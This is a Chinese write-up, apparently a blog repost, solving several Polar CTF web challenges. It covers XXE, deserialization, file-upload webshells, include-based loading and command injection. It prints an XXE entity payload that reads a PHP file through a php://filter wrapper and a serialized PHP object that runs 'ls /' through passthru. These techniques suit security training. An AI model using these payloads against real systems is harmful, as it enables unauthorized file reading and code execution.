当前位置: 首页 > news >正文

Polar靶场-Web中等题目记录(15-32)

ExX?

根据题目,发现存在phpinfo,搜索发现flag

image

很遗憾,flag错误,是假的

没有什么思路,扫描网站目录,发现存在dom.php

image

查看提示,存在xxe漏洞

image

尝试构造利用,读取flag

payload:

<!DOCTYPE root [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flagggg.php" >
]><root><username>&xxe;</username><password>root</password>
</root>

image

image

EZ_Host

查看题目提示,存在?host=YOUR_HOST可执行参数

image

构造命令执行语句

image

读取flag

image

传马

查看题目,上传一句话木马

image

连接获取webshell,使用命令行读取flag

image

笑傲上传

老规矩,上传文件测试

image

监测存在过滤(监测文件内容),尝试上传图片马绕过

image

发现无法连接,查看网站源代码发现include.php

image

尝试使用file参数读取上传一句话木马进行加载

image

image

连接获取flag

image

序列一下

查看题目,反序列化题目

image

构造payload

<?php
class Polar {public $url = 'polarctf.com';public $lt  = 'passthru';public $b   = 'ls /';
}
echo serialize(new Polar);
?>

image

获取flag

image

坏掉的上传页

查看题目,发现上传无法进行

image

找到config.php

image

访问查看,发现默认上传路径

image

构造上传脚本

image

可以正常上传,连接获取flag

image

xxmmll

image

抓包发现提示xxmmll.php

image

读取flag

image

根据报错提示,输入xml语句,成功回显flag

<?xml version="1.0" encoding="UTF-8"?>
<xxe><Message>123123</Message>
</xxe>

image

这个题目有偷鸡的方法,可以扫目录,能直接查看到flag

image

Note

根据提示,查看debug.log

image

没有任何思路,看提示应该是反序列,可以通过logs.txt查看提示,但是不太会

选择偷鸡,访问flag.txt

image

http://www.rkmt.cn/news/98400.html

相关文章:

  • 数据结构期末复习:递归与循环核心算法实战总结
  • 云原生时代分布式任务调度的5大突破性变革
  • 【机械臂】基于 RRT 算法在3D 机械臂(主轴)路径规划中的工程实现,在含固定障碍物(副轴、外壳)的约束环境中,找到从起点构型到目标构型的无碰撞路径附matlab代码
  • 从产线到质检,兰亭妙微教你做 “工人愿意用” 的工业 UI
  • pyautocad 尺寸颜色 尺寸界线颜色 尺寸文字颜色 改成白色 方便打印
  • Java Web 学习全指南:从入门到实战,体系化掌握核心技能
  • 基于SpringBoot的智慧药店药品信息管理系统-计算机毕业设计源码+LW文档
  • 股票历史分时BOLL数据之Python、Java等多种主流语言实例代码演示通过股票数据接口
  • 终极日语学习方案:Memento播放器如何让看剧效率翻倍300%
  • 源码级解析:九尾狐AI如何构建企业级营销自动化架构|AI获客引擎设计
  • OceanBase 常见异情况汇总 - 详解
  • 2025.12.14——1黄
  • C++中的原型模式 - 详解
  • OpenCode终极指南:5步掌握终端AI编程助手的核心功能
  • 【Qt】生产者-消费者模式学习笔记
  • Cryptlib
  • java计算机毕业设计社区药店系统 社区药房智慧管理平台 街区药品零售信息管理系统
  • 中望CAD2026:快速选择相似的对象
  • 34、提升Ubuntu服务器容错性的全面指南
  • 35、RAID 系统迁移与管理全攻略
  • ansible-hoc 模块使用
  • 38、构建高可用集群:Heartbeat与DRBD实战指南
  • 986896786
  • 雷达原理 魏青 笔记 雷达方程
  • k8s Etcd版本号
  • 理解HotSpot虚拟机对象
  • Jenkins升级
  • K8S-EFK日志收集实战指南
  • 7878678678
  • ansible部署nfs